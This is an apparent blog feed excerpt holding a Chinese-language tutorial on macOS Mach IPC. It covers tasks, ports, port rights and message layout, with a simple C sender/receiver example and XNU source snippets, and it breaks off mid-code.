&lt;p&gt;将应用程序分成多个部分，还可以提高程序的可靠性，防止程序的部分代码崩溃导致整个程序的退出。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;每个 XPC 服务都位于自己的沙箱，即 XPC 服务有&lt;strong&gt;自己的容器&lt;/strong&gt;和&lt;strong&gt;一组权限&lt;/strong&gt;。包含在应用程序中 XPC 服务只能由应用程序自己访问。当应用程序启动时，系统会自动将它找到的每个 XPC 服务注册到应用程序可见的命名空间中。之后应用程序便可以与 XPC 服务通信并执行请求。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;XPC 服务的特点：&lt;strong&gt;权限分离&lt;/strong&gt; + &lt;strong&gt;错误隔离&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;XPC 服务有 launchd 所管理，当 XPC 服务被意外终止（或者崩溃）后，该服务将会被 launchd 重启。&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    
    <category term="mac" scheme="https://kiprey.github.io/tags/mac/"/>
    
    <category term="ipc" scheme="https://kiprey.github.io/tags/ipc/"/>
    
    <category term="xpc" scheme="https://kiprey.github.io/tags/xpc/"/>
    
  </entry>
  
  <entry>
    <title>MacOSX Mach IPC 入门</title>
    <link href="https://kiprey.github.io/2021/12/mach_ipc_intro/"/>
    <id>https://kiprey.github.io/2021/12/mach_ipc_intro/</id>
    <published>2021-12-23T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.034Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>Mach，是一个<strong>面向通信</strong>的操作系统<strong>微内核</strong>，其基本工作单位为 <code>task</code>（而不是 process）。Mach 内核提供了一种 IPC 机制，而 XNU 的大多数服务也建立在 Mach IPC 和 Mach Task 上。</p><p>Mach 有多种抽象的基本概念，其中一部分分别是 <code>task</code>、<code>thread</code>、<code>port</code>、<code>message</code>、<code>memory object</code>。</p><p>Mach 微内核作为 MacOS XNU 内核的组成部分，接管了相当重要的一部分功能。其中最著名的莫过于 Mach IPC 进程间通信机制。</p><p>本人将在这里简单记录一下 Mach IPC 部分机理。</p><blockquote><p>需要注意的是，这是本人第一次接触 Mach IPC，因此其中可能会有一部分陈述或者说明存在问题，还请各位师傅不吝指出。</p></blockquote><span id="more"></span><h2 id="二、Mach-Task-Thread">二、Mach Task &amp; Thread</h2><p>Mach 将传统的 UNIX <strong>进程</strong>抽象拆分成了 <code>task</code> 和 <code>thread</code>。其中：</p><ul><li><p>task 是一个<strong>执行环境与静态实体</strong>。它并不直接执行计算，而是提供了一个框架，其他实体（例如线程）在其中执行。内核中的BSD 进程（类似 Unix 进程）与 Mach task 有着一一对应的关系。</p><p>task 还是<strong>资源分配的基本单元</strong>。那些与 BSD 进程所关联的资源被包含于 task 中。</p><p>同时每个 task 也代表了<strong>保护边界</strong>。在获取访问权限前，不同 task 不能访问其他的 task 中的资源。</p></li><li><p>thread 是 Mach 中实际执行的实体，也是 task 的控制流执行点。它在 task 的上下文中执行。</p><p>thread 执行的代码驻留在其 task 中的地址空间中。每个 task 中包含 0 至多个 thread。</p></li></ul><p>通过上面的说明，我们也可以将 task 这个概念，间接理解成传统意义上的 process（是不是非常的相似:)）</p><blockquote><p>需要注意的是：一旦创建了 task，那么<strong>任何持有着 task identifier 的用户都可以修改 task</strong>。</p></blockquote><h2 id="三、Mach-Port">三、Mach Port</h2><h3 id="1-概念">1. 概念</h3><p>Mach Port 是受内核保护的<strong>单向</strong> IPC 通道、功能和名称。在 Mach <strong>内核</strong>中，mach port 被实现成一个<strong>有限长度</strong>且<strong>被内核所维护</strong>的<strong>消息队列</strong>，与 Linux Pipe 有些相似，都会因为队列满或者队列空而阻塞，其基本操作为发送和接收消息。该队列是<strong>多生产者、单消费者</strong>队列，只能有单个 receive right。</p><p>Port 的这种抽象以及相关的操作是 mach 通信的基础。一个端口有着与之相关联的内核管理权限，而每个 task 都必须拥有 port 的适当权限才能操作它。当一个 Mach Message 被发送至某个 task 中，只有具有<strong>接收权限</strong>的 Mach port 才能接收该 Message，并将其从队列中删除。</p><blockquote><p>例如这种权限设置可以允许一些任务向给定的端口发送信息，或者指定一些任务可以接收到发送给它的信息。</p></blockquote><p>mach port 在 Mach 中<strong>非常重要</strong>，它表示着<strong>对象的引用</strong>，代表了OS中各类服务、资源等抽象。在 Mach 内核中，相当多的数据结构、服务等等都用 mach port 表示；而用户也可以通过对应的 mach port 来访问到 tasks、threads以及 memory objects。</p><p>Mach port 的名称是一个整数，但与文件描述符不同， Mach 端口不会通过 fork 而隐式继承。</p><h3 id="2-Port-Right">2. Port Right</h3><p>每个 Mach Port 都有着对应 port 的<strong>权限（right）</strong>，以下是 Mac OSX 所定义的部分 port right 类型：</p><ul><li><code>MACH_PORT_RIGHT_SEND</code>：表示权限拥有者可以向该端口发送信息</li><li><code>MACH_PORT_RIGHT_RECEIVE</code>：表示权限拥有者可以从该端口中获取 Message</li><li><code>MACH_PORT_RIGHT_SEND_ONCE</code>：表示发送方只能发送一次 Message。不管该权限是否被销毁，该句柄始终会发送一条消息。</li><li><code>MACH_PORT_RIGHT_PORT_SET</code>：表示多个 port name 的集合，可以被看做是多个端口接收权限的集合。端口集可用于同时侦听多个端口，类似于 Unix epoll 机制等等。</li><li><code>MACH_PORT_RIGHT_DEAD_NAME</code>：只是一个占位符。若某个端口的权限被销毁后，则该端口的<strong>所有现有句柄的权限</strong>都将转换成 dead name（即无效权限）。dead name 机制是为了防止所接管的<strong>端口名</strong>被过早重用。</li></ul><p>若某个端口的<strong>接收权限</strong>被释放时，则将该端口视为<strong>被销毁</strong>。注意接收句柄在任何时候都只能有一个 task 所持有。</p><p>而<strong>端口权限名称（port right name）<strong>是某个 task 用来</strong>引用所持有的 port right</strong> 的特定整数值，有点类似文件描述符。需要注意的是每个port right name 只会在原始任务的上下文中有意义，这意味着即便将该名称发送给其他的任务，该任务也无法使用该名称访问对应的 mach port。（这也再次类似于文件描述符）</p><blockquote><p>这个 port right name 正是我们日常见到最多的**用户层（注意必须指定是用户层）**中 <code>mach_port_t</code> 类型的值。</p><p>注意还有一个 port name（和 port right name 不一样），在用户层中是 mach_port_name_t 类型的值。</p></blockquote><p><strong>port name 和 right 的关系</strong>，类似于 Unix 中<strong>文件描述符</strong>和文件描述符<strong>权限</strong>的关系。但是，<strong>请勿直接将 right 等同于 权限</strong>，mach port right 和<strong>权限</strong>二字仍然有着较大的差别。</p><h2 id="四、Mach-Message">四、Mach Message</h2><p>Mach IPC message 是线程之间相互通信的数据对象，它也是 tasks 之间通信的典型方式。一个 Message 中可能包含实际的数据（即内联数据），或者包含指向外联数据（out-of-line，OOL）的指针；后者是针对大数据传输的一种优化。</p><p>Mach Message 由以下几个部分组成：</p><ul><li><p>一个<strong>强制</strong>要有的消息头 （mach_msg_header_t 类型）</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span>   <span class="keyword">struct</span> </span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">mach_msg_bits_t</span>     msgh_bits;           <span class="comment">// 一些消息标志位</span></span><br><span class="line">  <span class="type">mach_msg_size_t</span>     msgh_size;           <span class="comment">// 消息 header + body + data 的总大小</span></span><br><span class="line">  <span class="type">mach_port_t</span>         msgh_remote_port;    <span class="comment">// 目标 port right</span></span><br><span class="line">  <span class="type">mach_port_t</span>         msgh_local_port;     <span class="comment">// 辅助 port right</span></span><br><span class="line">  <span class="type">mach_port_name_t</span>    msgh_voucher_port;</span><br><span class="line">  <span class="type">mach_msg_id_t</span>       msgh_id;            <span class="comment">// 传递 mach msg 时不会使用该字段，用户可自行设置该字段</span></span><br><span class="line">&#125; <span class="type">mach_msg_header_t</span>;</span><br></pre></td></tr></table></figure></li><li><p>一个可选的消息 body （mach_msg_body_t 类型）</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">        <span class="type">mach_msg_size_t</span> msgh_descriptor_count;</span><br><span class="line">&#125; <span class="type">mach_msg_body_t</span>;</span><br></pre></td></tr></table></figure><blockquote><p>注意，消息 body <strong>并不只是</strong>这一个简简单单的结构体，请看下面的图。</p></blockquote></li><li><p>用户待发送的数据 data</p></li><li><p>一个可选的 tailer（mach_msg_trailer_t 类型）。该字段只与发送方有关。这个我们将在下面讲到。</p></li></ul><p>一个简单 Message 示例。其中 header.size 描述的是 header + data 的总大小：</p><p><img src="/2021/12/mach_ipc_intro/5e0d813f5ca94df8896453137156d751.png" alt="Mach消息发送机制_第1张图片"></p><p>一个复杂 Message 示例。与简单消息不同的是，复杂消息还包含了 body 信息，用以额外说明一些信息。</p><p><img src="/2021/12/mach_ipc_intro/bbb233c138ce4e8595162d43dcb90e5a.png" alt="Mach消息发送机制_第2张图片"></p><p>这个是更详细的说明图：</p><p><img src="/2021/12/mach_ipc_intro/image-20211230113611950.png" alt="image-20211230113611950"></p><p>这是一个复杂 Message 的具体代码样例。其中 <strong>body 部分包括 <code>msgBody</code> 字段和 <code>ports[1]</code> 字段</strong>，待发送 data 部分为 <code>notifyHeader</code> 字段：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">PingMsg</span> &#123;</span><br><span class="line">    <span class="type">mach_msg_header_t</span>           msgHdr;</span><br><span class="line">    <span class="type">mach_msg_body_t</span>             msgBody;</span><br><span class="line">    <span class="type">mach_msg_port_descriptor_t</span>  ports[<span class="number">1</span>];</span><br><span class="line">    OSNotificationHeader64      notifyHeader __attribute__ ((packed));</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>Message 的具体使用与机理将在下面使用中慢慢说明。</p><h2 id="五、Mach-API-入门使用">五、Mach API 入门使用</h2><h3 id="1-单向-Mach-通信示例">1. 单向 Mach 通信示例</h3><h4 id="代码示例">*. 代码示例</h4><p>以下是使用 Mach 低级 API 进行 IPC 的一个简单例子。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;servers/bootstrap.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;assert.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">sender</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 从 bootstrap 中查询并获取一个 mach port</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">bootstrap_look_up</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, &amp;port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;bootstrap_look_up() returned port right name %d\n&quot;</span>, port);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 构造待发送的信息</span></span><br><span class="line">    <span class="keyword">struct</span> &#123;</span><br><span class="line">        <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">        <span class="type">char</span> texts[<span class="number">20</span>];</span><br><span class="line">        <span class="type">int</span> integer;</span><br><span class="line">    &#125; message;</span><br><span class="line"></span><br><span class="line">    message.header.msgh_bits = <span class="built_in">MACH_MSGH_BITS</span>(MACH_MSG_TYPE_COPY_SEND, <span class="number">0</span>);</span><br><span class="line">    message.header.msgh_remote_port = port;</span><br><span class="line">    message.header.msgh_local_port = MACH_PORT_NULL;</span><br><span class="line">    message.header.msgh_size = <span class="built_in">sizeof</span>(message);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">strcpy</span>(message.texts, <span class="string">&quot;kiprey_texts&quot;</span>);</span><br><span class="line">    message.integer = <span class="number">123</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 将其发送</span></span><br><span class="line">    <span class="type">mach_msg_return_t</span> mr = <span class="built_in">mach_msg_send</span>(&amp;message.header);</span><br><span class="line">    <span class="built_in">assert</span>(mr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;message is sent.\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">receiver</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 创建一个带有接收权限的 mach port</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;mach_port_allocate() created port right name %d\n&quot;</span>, port);</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// 给该 port 再增加一个发送权限</span></span><br><span class="line">    kr = <span class="built_in">mach_port_insert_right</span>(<span class="built_in">mach_task_self</span>(), port, port, MACH_MSG_TYPE_MAKE_SEND);</span><br><span class="line">    <span class="built_in">assert</span> (kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;mach_port_insert_right() inserted a send right\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 将该端口的 send right 发送给 bootstrap，这样就可以被其他进程所查询</span></span><br><span class="line">    kr = <span class="built_in">bootstrap_register</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, port);</span><br><span class="line">    <span class="built_in">assert</span> (kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;bootstrap_register()&#x27;ed our port\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 等待 message</span></span><br><span class="line">    <span class="keyword">struct</span> &#123;</span><br><span class="line">        <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">        <span class="type">char</span> texts[<span class="number">20</span>];</span><br><span class="line">        <span class="type">int</span> integer;</span><br><span class="line">        <span class="type">mach_msg_trailer_t</span> trailer;</span><br><span class="line">    &#125; message;</span><br><span class="line"></span><br><span class="line">    message.header.msgh_size = <span class="built_in">sizeof</span>(message);</span><br><span class="line">    message.header.msgh_local_port = port;</span><br><span class="line">    kr = <span class="built_in">mach_msg_receive</span>(&amp;message.header);</span><br><span class="line">    <span class="built_in">assert</span> (kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Got a message\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Text: %s, number: %d\n&quot;</span>, message.texts, message.integer);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> * argv[])</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(fork() == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// 等待 receiver 注册好 port 后再发送信息</span></span><br><span class="line">        <span class="built_in">sleep</span>(<span class="number">1</span>);</span><br><span class="line">        <span class="built_in">sender</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="built_in">receiver</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>测试结果：</p><p><img src="/2021/12/mach_ipc_intro/image-20211225192910087.png" alt="image-20211225192910087"></p><p>接下来将简单讲讲该例子中所调用的一些用户 API。</p><h4 id="a-mach-port-allocate">a. mach_port_allocate</h4><p>初始时，接收端调用 <code>mach_port_allocate</code> 创建一个指定权限的 mach port：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">mach_port_t</span> port;</span><br><span class="line"><span class="type">kern_return_t</span> kr = <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;port);</span><br></pre></td></tr></table></figure><p>该函数的定义如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">mach_port_allocate</span><span class="params">(<span class="type">ipc_space_t</span> task,  <span class="type">mach_port_right_t</span> right, <span class="type">mach_port_name_t</span> *name)</span></span></span><br></pre></td></tr></table></figure><p>其中，第一个参数指定当前进程所在的 task。有趣的是，这种<strong>指定 task</strong> 的方式也是通过传递一个 mach port name 来完成。以下是 task_self_trap 函数的源代码，mach_task_self 函数是该函数的 wrapper。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> *  Routine:    task_self_trap [mach trap]</span></span><br><span class="line"><span class="comment"> *  Purpose:</span></span><br><span class="line"><span class="comment"> *      Give the caller send rights for his own task port.</span></span><br><span class="line"><span class="comment"> *  Conditions:</span></span><br><span class="line"><span class="comment"> *      Nothing locked.</span></span><br><span class="line"><span class="comment"> *  Returns:</span></span><br><span class="line"><span class="comment"> *      MACH_PORT_NULL if there are any resource failures</span></span><br><span class="line"><span class="comment"> *      or other errors.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">mach_port_name_t</span></span></span><br><span class="line"><span class="function"><span class="title">task_self_trap</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    __unused <span class="keyword">struct</span> task_self_trap_args *args)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">task_t</span> task = <span class="built_in">current_task</span>();</span><br><span class="line">    <span class="type">ipc_port_t</span> sright;</span><br><span class="line">    <span class="type">mach_port_name_t</span> name;</span><br><span class="line"></span><br><span class="line">    sright = <span class="built_in">retrieve_task_self_fast</span>(task);</span><br><span class="line">    name = <span class="built_in">ipc_port_copyout_send</span>(sright, task-&gt;itk_space);</span><br><span class="line">    <span class="keyword">return</span> name;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>第二个参数指定当前待分配 Mach port 的 right，这里请求的是<strong>接收权限</strong>。根据 xnu 源码，该函数的第二个参数只有以下三种有效：</p><ul><li><code>MACH_PORT_RIGHT_RECEIVE</code>：创建一个新端口，且当前只有接收权限</li><li><code>MACH_PORT_RIGHT_PORT_SET</code>：创建一个空的端口集，其中端口集里没有任何成员</li><li><code>MACH_PORT_RIGHT_DEAD_NAME</code> ：创建一个新的 dead name</li></ul><p>该函数的第三个参数指定 <strong>成功分配 port 时其所存放的位置</strong>，这个没啥好说的，略过。</p><h4 id="b-mach-port-insert-right">b. mach_port_insert_right</h4><p>作用：将指定的 port right 插入进当前 task 中。</p><p>例子中的使用方式：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 给该 port 再增加一个发送权限</span></span><br><span class="line">kr = <span class="built_in">mach_port_insert_right</span>(<span class="built_in">mach_task_self</span>(), port, port, MACH_MSG_TYPE_MAKE_SEND);</span><br></pre></td></tr></table></figure><p>其函数声明如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span></span></span><br><span class="line"><span class="function"><span class="title">mach_port_insert_right</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">ipc_space_t</span> task,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">mach_port_name_t</span> name,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">mach_port_t</span> poly,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">mach_msg_type_name_t</span> polyPoly)</span></span></span><br></pre></td></tr></table></figure><p>在这个例子中，调用者会对新创建的 port （此时只有 receive right） 添加上 send right。这里的 send right 指的是<strong>给当前 port 发送 mach message 的权限</strong>。</p><h4 id="c-bootstrap-register-lookup">c. bootstrap_register/lookup</h4><p>在 OSX 中，当一个新的 task 被创建时，它会被额外设置一组特殊的Mach port。其中包括：</p><ul><li>主机端口（host port，itk_host），表示运行该任务的机器。该端口允许 task 获取有关内核和主机的信息。</li><li>任务端口（task port，itk_sself），即这个端口引用的任务是自己。这个端口不允许用于控制自生，貌似该端口只能用于获取 task info。</li><li>引导端口（bootstrap port，itk_bootstrap），连接到 bootstrap  server（launchd）。</li></ul><blockquote><p>剩余的可以在 <code>osfmk\mach\task_special_ports.h</code> 中了解。</p></blockquote><p>对应与 task 内核结构体中的字段如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* IPC structures */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_self;  <span class="comment">/* not a right, doesn&#x27;t hold ref */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_nself; <span class="comment">/* not a right, doesn&#x27;t hold ref */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_sself; <span class="comment">/* a send right */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">exception_action</span> exc_actions[EXC_TYPES_COUNT];</span><br><span class="line"><span class="comment">/* a send right each valid element  */</span></span><br><span class="line"><span class="comment">// host port</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_host;  <span class="comment">/* a send right */</span> </span><br><span class="line"><span class="comment">// bootstrap port</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_bootstrap; <span class="comment">/* a send right */</span></span><br><span class="line"><span class="comment">// seatbelt port</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_seatbelt;  <span class="comment">/* a send right */</span></span><br><span class="line"><span class="comment">// seatbelt port</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_gssd;  <span class="comment">/* yet another send right */</span></span><br><span class="line"><span class="comment">// debug port</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_debug_control; <span class="comment">/* send right for debugmode communications */</span></span><br><span class="line"><span class="comment">// task_access port</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_task_access; <span class="comment">/* and another send right */</span> </span><br><span class="line"><span class="comment">// resume port</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_resume;    <span class="comment">/* a receive right to resume this task */</span></span><br><span class="line"><span class="comment">// 注册端口, 可以调用 mach_ports_register 进行注册</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_registered[TASK_PORT_REGISTER_MAX];</span><br><span class="line"><span class="comment">/* all send rights */</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_space</span> *itk_space;</span><br></pre></td></tr></table></figure><p>可以发现这些 <code>struct ipc_port itk_*</code> 都是特殊的 mach port，每个 task 都会被设置。</p><blockquote><p>其中，<code>itk_host</code>、<code>itk_bootstrap</code>、<code>itk_seatbelt</code>、<code>itk_gssd</code>、<code>itk_task_access</code> 都是从 parent task 中继承。</p></blockquote><p>对于 <code>itk_registered</code> 数组来说，用户可以使用 <strong>mach_ports_register</strong> 函数将目标端口注册进该数组中，并使用 <strong>mach_ports_lookup</strong> 进行查询。注册后的 port right 将会填充至 task 结构体中 itk_registered 数组的某个槽。</p><p>bootstrap  server 提供一个 port namespace，task 可以在其中注册自己的端口，其他 task 可以查找并向其发送消息。</p><p>我们可以将 bootstrap  server 看作一个电话簿：task 可以放置一个<strong>已知且被命名</strong>的值，以对应于该 task 正在监听的 Mach port。</p><p>若某个 task 需要向 bootstrap  server 注册服务，则 task 可以使用 <code>bootstrap_register()</code> 函数，该函数接受字符串名称和与之关联的Mach端口。但需要主要的是，Mac OSX 在10.5中弃用了这个函数，因此在编译上面的例子时，编译器会报出一个 Deprecated 的 warnning。</p><blockquote><p>不过，我们还可以使用 bootstrap_check_in 来取代 bootstrap_register 函数。</p></blockquote><p>在这个例子中，接收方会将<strong>带有 send right 的 mach port</strong> 注册进 bootstrap 中；那么当<strong>发送方</strong>尝试向 bootstrap 申请获取<strong>接收方</strong>的 port 时，bootstrap 就可以将<strong>当前所注册的 mach port 的 send right</strong> 复制一份给<strong>发送方</strong>。</p><p>这样，<strong>发送方</strong>便有了该 mach port 的 send right，可以向该 port 发送数据。而 mach port 的另一端（也就是<strong>接收方</strong>）便可以直接读取到发送方发来的消息。</p><h4 id="d-mach-msg">d. mach_msg</h4><p>作用：发送 mach message 或者接收 mach message。在这个例子中，发送方和接收方都会间接调用到这个函数来发送或者接收 mach msg。</p><p>我们先简单看看 mach_msg 函数的定义，了解该函数各个参数的作用或功能，内核的具体处理方式将在后面讲到。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span 